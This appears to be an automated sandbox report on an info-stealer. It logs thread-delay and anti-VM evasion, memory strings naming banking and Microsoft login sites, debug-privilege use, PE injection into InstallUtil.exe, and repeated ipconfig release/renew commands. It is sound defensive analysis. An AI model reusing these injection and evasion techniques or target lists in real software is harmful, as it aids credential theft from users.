Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 97562
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 97453
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 97343
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 97234
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 97112
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 96984
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 96875
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 96765
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 96652
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 96519
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 96281
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 95984
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 95796
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 95684
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 95578
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 95468
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 95359
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 95250
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 95137
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 95016
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 94906
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 94796
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 94636
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 94531
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 99874
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 99765
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 99656
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 99547
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 99422
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 99312
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 99198
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 98609
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 98481
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 98359
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 98232
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 98083
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 97954
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 97812
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 97703
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 97593
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 97462
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 97344
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 97219
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 97107
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 96984
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 96875
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 96765
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 96656
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 96547
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 96437
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 96287
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 96164
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 96044
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 95922
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 95797
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 95676
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 95547
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 95437
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 95328
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 95219
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 95094
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 94984
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 94873
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 94765
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 94643
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 94516
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 94391
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 94266
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 94156
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 94047
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 93937
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 93828
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Thread delayed: delay time: 93714
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: tmp3509.tmp.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: tmp3509.tmp.5.dr Binary or memory string: discord.comVMware20,11696428655f
Source: tmp3509.tmp.5.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: tmp3509.tmp.5.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: tmp3509.tmp.5.dr Binary or memory string: global block list test formVMware20,11696428655
Source: tmp3509.tmp.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: tmp3509.tmp.5.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: tmp3509.tmp.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: tmp3509.tmp.5.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: InstallUtil.exe, 00000022.00000002.2551008010.0000000001035000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
Source: tmp3509.tmp.5.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: tmp3509.tmp.5.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: tmp3509.tmp.5.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: tmp3509.tmp.5.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: tmp3509.tmp.5.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: tmp3509.tmp.5.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 6RE1Z857ae.exe, 00000000.00000002.2196588124.0000000001248000.00000004.00000020.00020000.00000000.sdmp, Adobe_Install_Updater.exe, 0000000C.00000002.2367939209.0000000000738000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2439185938.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, Adobe_Install_Updater.exe, 00000014.00000002.2459838452.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, Plain_Checker.exe, 0000001B.00000002.2535830395.000000000129D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000002.3360649755.0000000005433000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000020.00000002.2554424860.0000000000AAF000.00000004.00000020.00020000.00000000.sdmp, Yftssfzf.exe, 00000036.00000002.2768654573.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, Yftssfzf.exe, 0000003A.00000002.2851121971.0000000000787000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: tmp3509.tmp.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: tmp3509.tmp.5.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: tmpD11A.tmp.5.dr Binary or memory string: IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
Source: tmp3509.tmp.5.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: tmp3509.tmp.5.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: tmp3509.tmp.5.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: tmp3509.tmp.5.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: tmp3509.tmp.5.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: tmp3509.tmp.5.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: tmp3509.tmp.5.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: tmp3509.tmp.5.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: tmp3509.tmp.5.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: tmp3509.tmp.5.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Yftssfzf.exe, 0000003A.00000002.2857282148.00000000024E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: build.exe, 00000005.00000002.2295067932.00000000011B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: tmp3509.tmp.5.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Yftssfzf.exe, 0000003A.00000002.2857282148.00000000024E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: InstallUtil.exe, 00000007.00000002.2199718697.00000000010A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
Source: tmp3509.tmp.5.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: tmp3509.tmp.5.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: tmp3509.tmp.5.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: build.exe.0.dr, NativeHelper.cs Reference to suspicious API methods: LoadLibrary("kernel32")
Source: build.exe.0.dr, NativeHelper.cs Reference to suspicious API methods: GetProcAddress(hModule, "GetConsoleWindow")
Source: 0.2.6RE1Z857ae.exe.6ba0000.15.raw.unpack, NativeMethods.cs Reference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Writes to foreign memory regions
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 416000 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 418000 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: AF5008 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 416000
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 418000
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: FD8008
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 416000
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 418000
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: DE5008
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 820000
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 822000
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 892000
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 894000
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 706008
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 472000
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 474000
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 98F008
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 472000
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 474000
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1164008
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe" Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe "C:\Users\user\AppData\Local\Temp\Plain_Checker.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Queries volume information: C:\Users\user\Desktop\6RE1Z857ae.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Users\user\AppData\Local\Temp\build.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
